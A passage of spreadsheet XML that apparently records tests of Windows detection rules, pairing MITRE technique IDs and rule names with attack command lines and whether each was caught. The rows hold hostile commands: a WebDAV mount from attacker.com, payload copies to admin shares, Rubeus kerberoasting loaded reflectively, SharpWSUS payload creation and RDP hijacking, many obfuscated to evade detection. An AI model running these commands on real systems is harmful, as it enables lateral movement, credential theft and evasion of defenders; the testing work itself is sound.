    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B241" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C241" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D241" s="43" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E241" s="43" t="inlineStr">
        <is>
          <t>net use Z: http://attacker.com/share /user:username /persistent:no</t>
        </is>
      </c>
      <c r="F241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H241" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I241" s="43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241" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K241" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B242" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C242" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D242" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E242" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN/Administrator</t>
        </is>
      </c>
      <c r="F242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J242" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K242" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="43" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C243" s="43" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D243" s="43" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E243" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I243" s="43" t="n"/>
      <c r="J243" s="43" t="n"/>
      <c r="K243" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="43" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B244" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C244" s="43" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D244" s="43" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E244" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I244" s="43" t="n"/>
      <c r="J244" s="43" t="n"/>
      <c r="K244" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B245" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C245" s="43" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D245" s="43" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E245" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I245" s="43" t="n"/>
      <c r="J245" s="43" t="n"/>
      <c r="K245" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B246" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C246" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D246" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E246" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I246" s="43" t="n"/>
      <c r="J246" s="43" t="n"/>
      <c r="K246" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B247" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C247" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D247" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E247" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G247" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H247" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution (7ec2c172-dceb-4c10-92c9-87c1881b7e18)</t>
        </is>
      </c>
      <c r="J247" s="43" t="n"/>
      <c r="K247" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C248" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D248" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E248" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G248" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H248" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J248" s="43" t="n"/>
      <c r="K248" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B249" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C249" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D249" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E249" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G249" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H249" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J249" s="43" t="n"/>
      <c r="K249" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B250" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C250" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D250" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E250" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J250" s="43" t="n"/>
      <c r="K250" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B251" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C251" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D251" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E251" s="43" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J251" s="43" t="n"/>
      <c r="K251" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B252" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C252" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D252" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E252" s="43" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J252" s="43" t="n"/>
      <c r="K252" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B253" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C253" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D253" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E253" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G253" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H253" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J253" s="43" t="n"/>
      <c r="K253" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B254" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C254" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D254" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E254" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "type C:\temp\payload.exe &gt; \\10.0.0.2\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I254" s="43" t="n"/>
      <c r="J254" s="43" t="n"/>
      <c r="K254" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B255" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpwsus_wsuspendu_execution</t>
        </is>
      </c>
      <c r="C255" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpWSUS/WSUSpendu Execution</t>
        </is>
      </c>
      <c r="D255" s="43" t="inlineStr">
        <is>
          <t>b0ce780f-10bd-496d-9067-066d23dc3aa5</t>
        </is>
      </c>
      <c r="E255" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "SharpWSUS.exe c^reate /p^ayload:C:\temp\payload.exe"</t>
        </is>
      </c>
      <c r="F255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="43" t="n"/>
      <c r="J255" s="43" t="n"/>
      <c r="K255" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B256" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C256" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D256" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E256" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I256" s="43" t="n"/>
      <c r="J256" s="43" t="n"/>
      <c r="K256" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B257" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C257" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D257" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E257" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EnCOdinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I257" s="43" t="n"/>
      <c r="J257" s="43" t="n"/>
      <c r="K257" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B258" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C258" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D258" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E258" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="43" t="n"/>
      <c r="J258" s="43" t="n"/>
      <c r="K258" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B259" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C259" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D259" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E259" s="43" t="inlineStr">
        <is>
          <t>netsh.exe i""nt portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I259" s="43" t="n"/>
      <c r="J259" s="43" t="n"/>
      <c r="K259" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C260" s="43" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D260" s="43" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E260" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "tscon 1337 /de^st:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="43" t="n"/>
      <c r="J260" s="43" t="n"/>
      <c r="K260" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="41" t="n"/>
      <c r="B261" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wmiexec_default_powershell</t>
        </is>
      </c>
      <c r="C261" s="41" t="inlineStr">
        <is>
          <t>HackTool - Wmiexec Default Powershell Command</t>
        </is>
      </c>
      <c r="D261" s="41" t="inlineStr">
        <is>
          <t>022eaba8-f0bf-4dd9-9217-4604b0bb3bb0</t>
        </is>
      </c>
      <c r="E261" s="41" t="n"/>
      <c r="F261" s="41" t="n"/>
      <c r="G261" s="41" t="n"/>
      <c r="H261" s="41" t="n"/>
      <c r="I261" s="41" t="n"/>
      <c r="J261" s="41" t="n"/>
      <c r="K261" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B262" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_rdp_hijack_shadowing</t>
        </is>
      </c>
      <c r="C262" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity</t>
        </is>
      </c>
      <c r="D262" s="41" t="inlineStr">
        <is>
          <t>6ba5a05f-b095-4f0a-8654-b825f4f16334</t>
        </is>
      </c>
      <c r="E262" s="41" t="n"/>
      <c r="F262" s="41" t="n"/>
      <c r="G262" s="41" t="n"/>
      <c r="H262" s="41" t="n"/>
      <c r="I262" s="41" t="n"/>
      <c r="J262" s="41" t="n"/>
      <c r="K262" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="41" t="n"/>
      <c r="B263" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C263" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D263" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E263" s="41" t="n"/>
      <c r="F263" s="41" t="n"/>
      <c r="G263" s="41" t="n"/>
      <c r="H263" s="41" t="n"/>
      <c r="I263" s="41" t="n"/>
      <c r="J263" s="41" t="n"/>
      <c r="K263" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B264" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C264" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D264" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E264" s="41" t="n"/>
      <c r="F264" s="41" t="n"/>
      <c r="G264" s="41" t="n"/>
      <c r="H264" s="41" t="n"/>
      <c r="I264" s="41" t="n"/>
      <c r="J264" s="41" t="n"/>
      <c r="K264" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="41" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B265" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C265" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D265" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E265" s="41" t="n"/>
      <c r="F265" s="41" t="n"/>
      <c r="G265" s="41" t="n"/>
      <c r="H265" s="41" t="n"/>
      <c r="I265" s="41" t="n"/>
      <c r="J265" s="41" t="n"/>
      <c r="K265" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="41" t="inlineStr">
        <is>
          <t>t1021.005</t>
        </is>
      </c>
      <c r="B266" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ultravnc_susp_execution</t>
        </is>
      </c>
      <c r="C266" s="41" t="inlineStr">
        <is>
          <t>Suspicious UltraVNC Execution</t>
        </is>
      </c>
      <c r="D266" s="41" t="inlineStr">
        <is>
          <t>871b9555-69ca-4993-99d3-35a59f9f3599</t>
        </is>
      </c>
      <c r="E266" s="41" t="n"/>
      <c r="F266" s="41" t="n"/>
      <c r="G266" s="41" t="n"/>
      <c r="H266" s="41" t="n"/>
      <c r="I266" s="41" t="n"/>
      <c r="J266" s="41" t="n"/>
      <c r="K266" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="41" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B267" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C267" s="41" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D267" s="41" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E267" s="41" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe /Embedding</t>
        </is>
      </c>
      <c r="F267" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G267" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H267" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I267" s="41" t="n"/>
      <c r="J267" s="41" t="n"/>
      <c r="K267" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="41" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B268" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C268" s="41" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D268" s="41" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E268" s="41" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe "-Embedding"</t>
        </is>
      </c>
      <c r="F268" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G268" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I268" s="41" t="n"/>
      <c r="J268" s="41" t="n"/>
      <c r="K268" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="41" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B269" s="41" t="inlineStr">
        <is>
